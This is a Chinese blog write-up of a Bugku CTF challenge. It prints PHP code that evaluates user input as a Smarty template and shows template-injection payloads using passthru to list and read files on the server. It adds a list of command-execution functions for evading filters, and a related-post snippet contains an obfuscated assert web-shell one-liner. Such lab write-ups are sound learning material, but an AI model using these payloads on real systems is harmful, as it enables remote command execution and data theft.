Bugku web

最新推荐文章于 2024-07-24 23:00:08 发布
最新推荐文章于 2024-07-24 23:00:08 发布
阅读量148 收藏 1
点赞数 2
文章标签: 前端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_67667368/article/details/131074004
版权

Bugku 聪明的php

题目

打开靶场界面是这样的在这里插入图片描述

解题步骤

看不懂,翻译过来的意思是 传递一个参数,可能标志文件的文件名是随机的,试着随便传一个参数id源码
页面显示出了网页源码

<?php
include('./libs/Smarty.class.php');
echo "pass a parameter and maybe the flag file's filename is random :>";
$smarty = new Smarty();
if($_GET){
    highlight_file('index.php');   //打印输出文件代码
    foreach ($_GET AS $key => $value) //遍历数组
    {
        print $key."\n";
        if(preg_match("/flag|\/flag/i", $value)){    //执行匹配正则表达式
            
            $smarty->display('./template.html');


        }elseif(preg_match("/system|readfile|gz|exec|eval|cat|assert|file|fgets/i", $value)){


            $smarty->display('./template.html');            
            
        }else{
            $smarty->display("eval:".$value);//把字符串当做代码执行
        }
        
    }
}
?>

这里初步推测是Smarty模板注入,url中写入id={7*7}
在这里插入图片描述
命令执行,在url中再次写入id=a{comment}b(comment是由星号包裹的)在这里插入图片描述
这里显示它将星号中间的字符串注释掉了,确定它是smarty模板注入,因为从源码中发现从源码中发现/system|readfile|gz|exec|eval|cat|assert|file|fgets/i 这些函数都被过滤掉了,这里使用passthru函数找到flag文件,并读取flag文件内容
在url中写入/?id={passthru(“ls /”)} (目的是查看当前目录下有什么)

在这里插入图片描述
查看一下_5330(不是系统默认的文件夹,有可能flag就在里面)
/?id={{passthru(“more /_5330”)}}在这里插入图片描述

补充说明

1.如何确定SSTI对应的模板在这里插入图片描述
注明,绿色箭头是命令执行成功后的步骤,红色箭头是执行失败进行的步骤。
这里的a{comment}b执行成功之后的结果是将comment注释掉,输出ab
2.php命令执行函数有

php系统程序执行 ¶

exec — 执行一个外部程序
passthru — 执行外部程序并且显示原始输出
proc_close — 关闭由 proc_open 打开的进程并且返回进程退出码
proc_open — 执行一个命令,并且打开用来输入/输出的文件指针。
popen — 打开一个指向进程的管道,该进程由派生给定的 command 命令执行而产生。
proc_terminate — 杀除由 proc_open 打开的进程
shell_exec — 通过 shell 环境执行命令,并且将完整的输出以字符串的方式返回。
system — 执行外部程序,并且显示输出
scandir 列出指定路径中的文件和目录
eval — 把字符串作为PHP代码执行
assert --函数直接将传入的参数当成PHP代码执行

linux查看文件的命令
cat tac more less head tail nl static-sh paste od bzmore bzless

php文件读取函数

printr() fread() fgets() vardump()
清歌挽梦流年
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
bugku web24
PRCORANGE的博客
04-16 143
题目: <?php if(isset($_GET['v1']) && isset($_GET['v2']) && isset($_GET['v3'])){ $v1 = $_GET['v1']; $v2 = $_GET['v2']; $v3 = $_GET['v3']; if($v1 != $v2 && md5($v1) == md5($v2)){ if(!strcmp($v3, $flag)){
bugku web10 头等舱
PRCORANGE的博客
04-07 252
题目: 什么也没有。 F12也没有任何信息 结合题目名称,猜测flag藏在http表头中,使用bp抓包获取表头 得到flag
bugku web题集锦
skysys的研究小屋
06-01 1247
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugku web source
cuddlylm的博客
06-22 433
没有任何提示,看一下源码 这个是假flag dirsearch一下看看吧 看样子是有git泄露的 githack一下 python GitHack.py http://114.67.246.176:11104/.git 看看这个文件李有啥 别看了,我看过,什么都没有,只有假flag 执行 git reflog 查看执行的命令日志 用git show命令看文件 做到这里就莫得思路了,查了一下 在git reflog之前,要先用 wget -r http://ip_address/.git .
bugku web bp
cuddlylm的博客
10-02 1759
因为确定了账号,所以只用爆破密码,抓包爆破一条龙,弱口令top1000来自 https://gitee.com/XiuMulty/PasswordDic/repository/archive/master.zip 爆破完了以后发现所有报文长度都是一样的 使用burp suite里的options选项卡找到Grep-Match(在响应中找出存在指定的内容的一项。)筛选出唯一没有提示的一篇报文 复制密码到网页就出flag 相比于一般的bp爆破题,这题要学的就是当报文长度都相同而不再作为筛选条件时,如何使
Bugku Web eval
网安小趴菜
10-28 670
Bugku CTF Web eval 个人解题思路
bugku web
ershuiyan的博客
11-18 695
Simple_SSTI_1传参找flag
Bugku WEB shell
qq_41696858的博客
07-03 2039
1.打开场景,啥有没有,常规操作:查看源码,扫路径,抓包也是啥也没有 2.查看作者提示,送给大家一个过狗一句话 $poc=“a#s#s#e#r#t”; $poc_1=explode("#",$poc); $poc_2=$poc_1[0].$poc_1[1].$poc_1[2].$poc_1[3].$poc_1[4].$poc_1[5]; $poc_2($_GET['s']) 其实就是运用拼接过waf,最后的运行结果是assert($_GET[‘s’]) 很明显assert是能执行shell命令的危险
bugku web35
PRCORANGE的博客
04-23 158
题目: 在css中发现提示 <?php error_reporting(0); $KEY='ctf.bugku.com'; include_once("flag.php"); $cookie = $_COOKIE['BUGKU']; if(isset($_GET['14858'])){ show_source(__FILE__); } elseif (unserialize($cookie) === "$KEY") { echo "$flag"; } else { ?>
bugku web
Is_Linmouren的博客
10-31 979
自己做题整理的解题思路
bugkuctf解题-WEB
05-04
本文主要针对"bugkuctf解题-WEB"这一主题,结合描述中的CTF菜鸟的解题经验分享,深入探讨Web解题的关键知识点。 首先,我们需要理解Web安全的基础概念。Web应用是基于HTTP/HTTPS协议的,其安全性主要取决于服务器端...
bugku web题INSERT INTO注入.docx
05-16
bugku web题INSERT INTO注入 明确注入点,是走的http报头的x-forwarded-for。  我尝试了bool型注入,发现自己构造的语句在自己数据库中会报错,但是这里并没有错误报告,因此考虑基于时间的盲注
web留言板
06-06
Web留言板 (0分) 设计一个简单的基于Web的留言板,要求如下:1)系统中所有页面,如果用户没登录,则让用户返回到登录页面login.jsp(说明:login.jsp页面填写用户的用户名和密码);2)留言板(message.jsp)页面中...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web-cookie欺骗.docx
05-16
Bugku-Web-cookie欺骗 Bugku-Web-cookie欺骗是指通过构造Cookie欺骗服务器,获取敏感信息或控制服务器行为的一种攻击方式。本文将详细介绍Bugku-Web-cookie欺骗的原理、攻击过程和防御方法。 原理 在Web应用程序...
网站基本布局CSS
m0_46608027的博客
07-24 794
* 滚动条轨道样式 *//* 滚动条样式 *//* 滑块样式 */
ASP.NET Web Api 使用 EF 6,DateTime 字段如何取数据库服务器当前时间
最新发布
yangshuquan的专栏
07-24 787
在做数据库设计时,为了方便进行数据追踪,通常会有几个字段是每个表都有的,比如创建时间、创建人、更新时间、更新人等,这些时间字段一般存储的是数据库服务器的时间,EF 是操作整个数据表对象,所以需要寻找方法来实现这个目的。本文分享 DB First 和 Code First 两种模式的 EF 中 DateTime 字段如何存储数据库服务器当前时间的方法。
TS如何处理js模块的类型?
闻人放歌的三寸青草园圃
07-24 257
【代码】TS如何处理js模块的类型?
Vue使用FullCalendar实现日历/周历/月历
_小郑有点困了的博客
07-23 349
需求背景:项目上遇到新需求,要求实现工单以日/周/月历形式展示。而且要求不同工单根据状态显示不同颜色,一个工单内部,需要以不同颜色显示三个阶段。
bugku sodirty
09-03
Bugku sodirty是一个题目,具体的解题过程可以在记录解题过程的介绍中找到。[1] 该题目可能涉及到PHP代码审计、MD5碰撞、比较绕过等内容。而在解题过程中,可能还会用到一些其他的题目和技术,如pwn3、pwn5、短标签绕过echo、eval代码注入漏洞、$$绕过特定字符限制等。 关于具体解题的详细步骤和方法,可以参考解题过程中的记录。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *3* [Bugku解题 web 【四】](https://blog.csdn.net/weixin_46703850/article/details/115184847)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *2* [bugku pwn libc](https://download.csdn.net/download/kety_gz/11656088)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v93^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值